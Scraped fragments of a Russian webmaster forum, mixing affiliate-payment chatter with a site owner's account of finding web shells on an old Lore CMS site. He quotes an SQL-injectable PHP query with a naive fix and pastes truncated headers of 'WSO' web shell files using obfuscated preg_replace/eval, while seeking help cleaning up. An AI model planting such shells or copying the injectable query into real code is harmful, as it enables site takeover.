Он хочет 300$))
Спасибо, это вариант, что то я и не подумал о этом)
Возможно еще будут варианты)
Я так понимаю что потихоньку выплачивают
так трудно отписать кому и сколько выплатили и когда следующая выплата?
ыы, спс, не понял где я лоханулся с доменами)
У всех плющит партнёрку или ток у меня?
Вчера целый день загрузить страницу партнерки не мог, соединение сброшено
Сегодня дизайн партнерки за 2009 год + стата криво пашет
новости тоже за 2009 год
Что происходит?
Проверил файлы с оригиналами, код который дописали не обнаружил, нужно еще раз проверить.
function id_exists($id, $table) { return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'"); }
для защиты достаточно добавить ????
function id_exists($id, $table) { if(!is_numeric($id)) die('wrong id'); return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'"); }
после того как удалил 2 шела, обнаружил код, прятался он в
var/templates_c файле %%239^%%239105369^footer.tpl.php
Файлы все обязательно вечером перелопатю)
На хакер.ру
Разве возможно через эти уязвимости загрузить шел?
(Там почти все в одном месте я думаю что сам подлатаю)
Раньше когда сохранял пароли в КутФТП, 1 или 2 раза прописывался ифрейм внизу во всех index main файлах, возможно тогда и залили шел?
старых бекапов нету...
в папке var есть файл, var.php
содержания типа
<?php #Web Shell by oRb$auth_pass = "63a9f0ea7bb98050796b649e85481845"; #root$color = "#df5";$default_action = "FilesMan";$default_charset = "Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C......................
дата модификации 2010 год, немного еще поискав
в папке cp\templates файл conf.php
<?php # Web Shell by oRb$auth_pass = "85b76548c1b6f822366ed0821219b6f7";$color = "#df5";$default_action = 'FilesMan';$default_use_ajax = true;$default_charset = 'Windows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\..................................
дата модификации 2007 год (время создания сайта и заливка остальных файлов)
выходит что я скрипт скачал изначально с шелом, а потом его просто обновили?
сайт я сам модифицировал, доступ к загрузке файлов имею только я. Возможно этот шел еще гдето следы оставляет?
сервер арендую у фрихост.ком.уа
1. Очень древний движок Lore 1.5.6
2. Вроде ничего не подключалось и не изменялось (судя по дате изменения файлов апача)
а у меня ФФ ругается